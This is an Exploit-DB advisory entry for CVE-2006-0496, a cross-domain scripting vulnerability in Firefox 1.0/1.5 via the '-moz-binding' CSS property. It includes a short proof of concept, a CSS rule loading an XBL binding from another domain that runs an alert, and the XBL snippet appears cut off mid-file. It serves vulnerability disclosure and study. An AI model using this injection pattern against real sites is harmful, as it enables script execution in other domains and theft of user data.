Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting Vulnerability

ID EDB-ID:27150
Type exploitdb
Reporter Chris Thomas
Modified 2006-01-30T00:00:00


Mozilla Firefox 1.0/1.5 XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability. CVE-2006-0496. Remote exploit for linux platform


Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.

This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information. 

http://domain1/path/to/page.html :

body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns=""

<binding id="xss">
alert("XBL XSS");